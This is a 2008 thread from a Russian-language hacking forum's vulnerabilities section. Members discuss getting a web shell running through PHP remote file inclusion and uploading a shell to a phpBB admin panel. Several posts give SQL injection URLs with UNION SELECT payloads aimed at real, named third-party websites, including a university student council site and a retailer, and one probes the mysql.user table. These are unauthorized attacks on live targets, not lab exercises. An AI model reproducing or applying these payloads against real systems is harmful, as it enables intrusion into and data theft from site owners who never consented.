HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.03.2008, 21:53
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
 
Ответить с цитированием

  #2  
Старый 26.03.2008, 21:58
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

потому, что он не воспринимается, как php-файл
 
Ответить с цитированием

  #3  
Старый 26.03.2008, 22:01
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

1.
Цитата:
у меня вопрос по php include,
запрос вида .php?page=http://site.ru/xz.txt? выводит текст файла,почему не запускается shell?
Потому что это не инклуд а читалка файлов
2.
Цитата:
.php?page=http://site.ru/xz.PHP попробуй
Мда. Ты админ хакерского форума?
3.
Цитата:
потому, что он не воспринимается, как php-файл
При инклуде любое расширение будет выполняться (пытаться выполниться) как php код.

Это не инклуд
__________________
..
 
Ответить с цитированием

  #4  
Старый 26.03.2008, 22:23
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

спасибо за ответы))
 
Ответить с цитированием

  #5  
Старый 27.03.2008, 21:08
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме
 
Ответить с цитированием

  #6  
Старый 27.03.2008, 22:20
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

P.S. Help o_O )
 
Ответить с цитированием

  #7  
Старый 27.03.2008, 22:28
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию

прив, народ, блин никак не получается залить шелл в пхпбб. есть админка. не раскритих путей. аватары на нормальность проверяються (не только расширение)
Такое пробовал (http://forum.antichat.ru/showpost.php?p=198446&postcount=3)

Последний раз редактировалось Dimi4; 27.03.2008 в 22:34..
 
Ответить с цитированием

  #8  
Старый 27.03.2008, 22:30
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

>> Это серьёзно?Можн залить shell?
http://studsovet.ulsu.ru/forum/
Cори если не по теме

Там уже кто то постарался:
Цитата:
IPB WARNING [2] ipsclass::load_template(/usr/virtual/studsovet.ulsu.ru/html/forum/cache/skin_cache/cacheid_/skin_global.php) [http://www.php.net/manual/en/function.load-template.html]: failed to open stream: No such file or directory (Line: 1327 of /sources/ipsclass.php)
>> Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

юзал юнион,написало вот такое чудо )).Хотел узнать,почему выдаёт такую ошибку,и каким образом мона ещё выбрать все столбцы.Груп бай мона юзать только для определения кол.-ва столбцов,как я понял,но не выбирать(какойнить там злоссный груп селект ) ))))))))).

P.S. Help o_O )

Сразу давай ссылку.
__________________
..
 
Ответить с цитированием

  #9  
Старый 27.03.2008, 22:41
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Ж(.Сам хотел воть...ну лан,на )))

http://www.laptopshowcase.co.uk/suppliers.php?id=-4+union+select+1,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #10  
Старый 27.03.2008, 23:49
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
Ээээ... .
http://www.laptopshowcase.co.uk/suppliers.php?id=-4+UNION+SELECT+1,2+FROM+suppliers.id--
Помойму это похоже на ->
Цитата:
Сообщение от K1nD[e]R  
2 Buffalon

Access denied for user 'studsovet'@'localhost' to database 'mysql'
Код:
http://studsovet.ulsu.ru/index.php?pid=8&fac=-1+UNION+SELECT+1,2,3,4,5+from+mysql.user/*
Нет прав на просмотр юзеров
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.